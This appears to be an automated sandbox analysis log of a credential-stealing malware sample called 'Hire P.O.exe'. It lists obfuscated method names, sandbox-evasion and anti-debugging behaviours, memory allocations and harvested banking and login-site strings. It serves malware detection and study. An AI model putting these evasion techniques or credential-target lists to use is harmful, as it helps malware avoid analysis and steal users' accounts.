                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, Y0B2qFTOrt8fYDnIPx.csHigh entropy of concatenated method names: 'QG1lVqC9YF', 'fxKlYAA5x5', 'PRpleeR3qV', 'HPjlii97tp', 'JvRltDoLGT', 'BlUlSmsI1n', 'epYlrIJhBT', 'k7Cl15bHAb', 'SsfloYcCYb', 'hrWlWZ17Ts'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, r9iVkW4yai1QaYMql0.csHigh entropy of concatenated method names: 'jg3XJwBDf', 'AXnwmu7q5', 'QcDumWv43', 'lTsCGPy6a', 'wny2WeymT', 'C8dhyWiel', 'p298q8MmQfcMcV29D1', 'PFHlE3jHI4ShiuX8p5', 'I1baypfKB', 'AdLb0SGVD'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, mP6s57zjbNgGXm0Y7p.csHigh entropy of concatenated method names: 'Vembur2B0n', 'uHIbL7VhLP', 'hfHb2yNbwo', 'Ui2bV7LjAh', 'rAWbYbNVr0', 'NsrbilRyFb', 'aEgbtCQy7c', 'J5ZbPD6KfG', 'R6Ubyod3ua', 'XNqbETed2q'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, iVuwKopcqJDeTOo64RM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lW29lEeHfi', 'mUr9bIG0iw', 'Y3h9F4GfDa', 'UDa99USKEN', 'PD69vu15kq', 'VXN9gZpqRw', 'OsE9P3JFbR'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, hs9Nap8aXLO5OZoZk9.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xnb4TV2VAx', 'xZo4JK4EaS', 'fBE4zgeYhk', 'iPZDmHXW0k', 'sPGDphrdHd', 'FSXD4OskJx', 'TVZDD3qWKp', 'OXN6qSt0HoPgVTXkjuD'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KPqRVFnR9qVYFUlZ6d.csHigh entropy of concatenated method names: 'Dispose', 'cckpT9EtfY', 'Pjy4Y5qLog', 'SeNcdy9vSY', 'OvjpJXjYwX', 'jEIpzrfZsZ', 'ProcessDialogKey', 'DLJ4m0B2qF', 'jrt4p8fYDn', 'SPx440As1a'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, d6Aj8GVImyFAcxMBFf.csHigh entropy of concatenated method names: 't5YOZQL2Eg', 'k0TOnPqLot', 'StxOGt3CH5', 'EbWOMubSxb', 'oNoOjZEmL6', 'VZJGNi0rnm', 'kZ0GkJla1Q', 'DXKGUULCf4', 'bMJG6grfQZ', 'MMDGT1wjDu'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, GtuFjRoxKwyrNHePV1.csHigh entropy of concatenated method names: 'qjVMy3LT5d', 'BrxMExlbyL', 'I7DMXTLg5c', 'ryKMwVX6NV', 'tGvMAIv0hQ', 'giHMuxuHrf', 'bGKMCRcwJX', 'H72ML2X9iY', 'Vr4M29v3o7', 'FRKMh2wwyA'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, PES2NXhRnw5g51v5YQ.csHigh entropy of concatenated method names: 'UkIGAL5WfA', 'wSeGCQMW9j', 'wq78eOSovr', 'WpM8iMxmQr', 'Bvx8tpi3wY', 'f2U8SiH5I8', 'Gx78rr3kOG', 'UN6816NCws', 'nna8o2dq5h', 'alB8W40uLZ'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, lvls2PpmaQGhXtwDDue.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iqRbshJwS1', 'LubbQxHyx5', 'NBQbxBpi5l', 'wN0b03NhRt', 'RHobqVv6Yg', 'v0WbIcQPIn', 've8bRiLKV1'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, AQJoCpxtIOGQRBSeCG.csHigh entropy of concatenated method names: 'FPM3LdEEUI', 'ogg32NH4vF', 'rIU3V87vgs', 'nWV3YYIpY0', 'bNN3ihTEJ3', 'jh53trIJwQ', 'qrO3rgEHxe', 'NQY31RLrDL', 'RPn3W7M1k1', 's6f3scXGqW'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, laawxFRaVYS1lM36q8.csHigh entropy of concatenated method names: 'zi8dHEE0QD', 'RY0dBRqde7', 'ToString', 'HORdKETaPo', 'o5tdn27Pwg', 'vVYd8rAIj6', 'St7dGvI37J', 'Oo4dOiCtTm', 'rrvdMOep1D', 's10djeFMeO'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, bdSd1r2Rq4aulnjYSv.csHigh entropy of concatenated method names: 'SZ38wVkvYw', 'boE8u9nEJG', 'gAO8Leoru2', 'zQ282uZpa9', 'SVO8f93Qlc', 'eDJ85pQI0N', 'isP8dTIjd6', 'dBp8aQ9Ni4', 'JeS8lJZFXK', 'xJf8bVDyLW'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, wEJoIGcYhcR48eX1BO.csHigh entropy of concatenated method names: 'eEtpMHAOCX', 'hd4pjWkGTv', 'LRqpH4auln', 'kYSpBvQES2', 'Lv5pfYQc6A', 'k8Gp5ImyFA', 'l0DRrBTw959hnXBSih', 'UMUxUAQwlO1t6L2R30', 'wnZppct28e', 'ABjpDIsFb8'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, bkeWOAkPCVNdnRElIs.csHigh entropy of concatenated method names: 'qQOd65bero', 'l1hdJ8KhMq', 'KfQamDOle7', 'Rv2apj1qmN', 'xJ7ds0Upgj', 'BYOdQJQ90Z', 'TrYdxMXOYp', 'dObd0iDaVt', 'iZ8dqFuu22', 'XjQdIwMHQo'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, sxpLOmU1xDck9EtfYs.csHigh entropy of concatenated method names: 'coIlfolDLN', 'R1eldoElc3', 'ABRllmJthM', 'c36lF9ilh5', 'zualvs9Gpo', 'ds3lPP0tQe', 'Dispose', 'j4aaKGQ3aZ', 'QP6anCDuQV', 'Fo3a8fk5PG'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, p3up78ppxv5lhJ5wrLo.csHigh entropy of concatenated method names: 'qX1bJL8Acp', 'r6LbzCVZOU', 'PbZFmILoLa', 'diNFpO4wxZ', 'J7ZF4rxFXO', 'j3nFDYQ6ff', 'Yn8Fc1od1M', 'DJ5FZBSg2m', 'YypFKALw24', 'vhTFnEKcib'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, JHAOCXLGd4WkGTvkMx.csHigh entropy of concatenated method names: 'lgVn0ypJb1', 'wCRnqg5gWE', 'NqvnIdcmSa', 'HJwnRrmXvF', 'p8EnNeS4qu', 'XPYnk0uuYm', 'T25nUtGoNZ', 'BMJn6Tl8q9', 'SGMnTU97Ms', 'CKHnJn6LfC'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.csHigh entropy of concatenated method names: 'bE3DZ3dAmL', 'htXDKUQOPY', 'rpkDn5L5Zh', 'QHSD8btFsw', 'NToDGd9Tk5', 'L9yDOHkIph', 'mTeDMvko4r', 'uMVDjwTpBm', 'hKxD7RCt1C', 'FcxDHpumDW'
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Hire P.O.exe PID: 7872, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 8E50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 9E50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: B060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E rdtsc 5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\Hire P.O.exe TID: 7892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 3268Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 3268Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe TID: 8036Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe TID: 8036Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0050C500 FindFirstFileW,FindNextFileW,FindClose,7_2_0050C500
                Source: C:\Users\user\Desktop\Hire P.O.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 0349A-n.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: fc.exe, 00000007.00000002.3139261279.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB bLe
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20
                Source: 0349A-n.7.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: active Brokers - COM.HKVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20
                Source: 0349A-n.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: 0349A-n.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: 0349A-n.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: 0349A-n.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903"E
                Source: 0349A-n.7.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: 0349A-n.7.drBinary or memory string: global block list test formVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: 0349A-n.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: 0349A-n.7.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: 0349A-n.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696503903
                Source: zKwhguHavy.exe, 0000000A.00000002.3140072304.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2231226439.0000024077D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 0349A-n.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: 0349A-n.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20,11696503903^
                Source: Hire P.O.exe, 00000001.00000002.1528745888.0000000008770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: rZvMciZcw2
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,14D
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: 0349A-n.7.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: 0349A-n.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EtVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: 0349A-n.7.drBinary or memory string: discord.comVMware20,11696503903f
                Source: 0349A-n.7.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: 0349A-n.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware20,11696503903x
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E rdtsc 5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00417793 LdrLoadDll,5_2_00417793
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01180115 mov eax, dword ptr fs:[00000030h]5_2_01180115
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116A118 mov ecx, dword ptr fs:[00000030h]5_2_0116A118
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116A118 mov eax, dword ptr fs:[00000030h]5_2_0116A118
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116A118 mov eax, dword ptr fs:[00000030h]5_2_0116A118
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116A118 mov eax, dword ptr fs:[00000030h]5_2_0116A118
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F0124 mov eax, dword ptr fs:[00000030h]5_2_010F0124
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01158158 mov eax, dword ptr fs:[00000030h]5_2_01158158
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01154144 mov eax, dword ptr fs:[00000030h]5_2_01154144
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01154144 mov eax, dword ptr fs:[00000030h]5_2_01154144
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01154144 mov ecx, dword ptr fs:[00000030h]5_2_01154144
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01154144 mov eax, dword ptr fs:[00000030h]5_2_01154144
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01154144 mov eax, dword ptr fs:[00000030h]5_2_01154144
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6154 mov eax, dword ptr fs:[00000030h]5_2_010C6154
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6154 mov eax, dword ptr fs:[00000030h]5_2_010C6154
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BC156 mov eax, dword ptr fs:[00000030h]5_2_010BC156
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114019F mov eax, dword ptr fs:[00000030h]5_2_0114019F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114019F mov eax, dword ptr fs:[00000030h]5_2_0114019F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114019F mov eax, dword ptr fs:[00000030h]5_2_0114019F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114019F mov eax, dword ptr fs:[00000030h]5_2_0114019F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01100185 mov eax, dword ptr fs:[00000030h]5_2_01100185
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01164180 mov eax, dword ptr fs:[00000030h]5_2_01164180
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01164180 mov eax, dword ptr fs:[00000030h]5_2_01164180
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BA197 mov eax, dword ptr fs:[00000030h]5_2_010BA197
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BA197 mov eax, dword ptr fs:[00000030h]5_2_010BA197
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BA197 mov eax, dword ptr fs:[00000030h]5_2_010BA197
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0117C188 mov eax, dword ptr fs:[00000030h]5_2_0117C188
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0117C188 mov eax, dword ptr fs:[00000030h]5_2_0117C188
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E1D0 mov eax, dword ptr fs:[00000030h]5_2_0113E1D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E1D0 mov eax, dword ptr fs:[00000030h]5_2_0113E1D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0113E1D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E1D0 mov eax, dword ptr fs:[00000030h]5_2_0113E1D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E1D0 mov eax, dword ptr fs:[00000030h]5_2_0113E1D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011861C3 mov eax, dword ptr fs:[00000030h]5_2_011861C3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011861C3 mov eax, dword ptr fs:[00000030h]5_2_011861C3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F01F8 mov eax, dword ptr fs:[00000030h]5_2_010F01F8
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011961E5 mov eax, dword ptr fs:[00000030h]5_2_011961E5
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01144000 mov ecx, dword ptr fs:[00000030h]5_2_01144000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01162000 mov eax, dword ptr fs:[00000030h]5_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DE016 mov eax, dword ptr fs:[00000030h]5_2_010DE016
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DE016 mov eax, dword ptr fs:[00000030h]5_2_010DE016
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DE016 mov eax, dword ptr fs:[00000030h]5_2_010DE016
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DE016 mov eax, dword ptr fs:[00000030h]5_2_010DE016
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156030 mov eax, dword ptr fs:[00000030h]5_2_01156030
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BA020 mov eax, dword ptr fs:[00000030h]5_2_010BA020
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BC020 mov eax, dword ptr fs:[00000030h]5_2_010BC020
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01146050 mov eax, dword ptr fs:[00000030h]5_2_01146050
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C2050 mov eax, dword ptr fs:[00000030h]5_2_010C2050
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EC073 mov eax, dword ptr fs:[00000030h]5_2_010EC073
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C208A mov eax, dword ptr fs:[00000030h]5_2_010C208A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011860B8 mov eax, dword ptr fs:[00000030h]5_2_011860B8
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011860B8 mov ecx, dword ptr fs:[00000030h]5_2_011860B8
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011580A8 mov eax, dword ptr fs:[00000030h]5_2_011580A8
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011420DE mov eax, dword ptr fs:[00000030h]5_2_011420DE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011020F0 mov ecx, dword ptr fs:[00000030h]5_2_011020F0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C80E9 mov eax, dword ptr fs:[00000030h]5_2_010C80E9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BA0E3 mov ecx, dword ptr fs:[00000030h]5_2_010BA0E3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011460E0 mov eax, dword ptr fs:[00000030h]5_2_011460E0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BC0F0 mov eax, dword ptr fs:[00000030h]5_2_010BC0F0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA30B mov eax, dword ptr fs:[00000030h]5_2_010FA30B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA30B mov eax, dword ptr fs:[00000030h]5_2_010FA30B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA30B mov eax, dword ptr fs:[00000030h]5_2_010FA30B
